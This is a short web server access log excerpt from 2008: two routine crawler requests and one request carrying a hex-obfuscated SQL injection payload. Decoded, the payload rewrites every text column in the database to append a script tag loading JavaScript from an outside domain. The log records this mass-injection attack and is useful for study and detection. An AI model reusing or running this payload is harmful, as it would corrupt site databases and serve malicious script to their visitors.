64.1.215.165 - - [17/Sep/2008:20:12:34 +0200] "GET /logs/usage_200709.html HTTP/1.0" 200 110974 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
208.36.144.10 - - [17/Sep/2008:20:25:37 +0200] "GET /f-search.html HTTP/1.0" 200 11800 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
24.125.244.126 - - [17/Sep/2008:20:28:01 +0200] "GET /?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 7869 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
